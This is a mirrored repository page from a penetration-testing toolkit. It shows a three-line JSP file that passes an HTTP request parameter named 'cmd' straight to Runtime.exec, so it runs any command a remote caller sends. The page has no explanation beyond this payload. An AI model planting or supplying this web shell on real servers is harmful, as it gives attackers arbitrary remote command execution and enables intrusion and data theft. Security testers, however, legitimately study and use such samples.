mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-02 06:46:07 -04:00
3 lines
66 B
Text
Executable file
3 lines
66 B
Text
Executable file
+<%
|
|
+Runtime.getruntime().exec(request.getParameter("cmd"))
|
|
+%>
|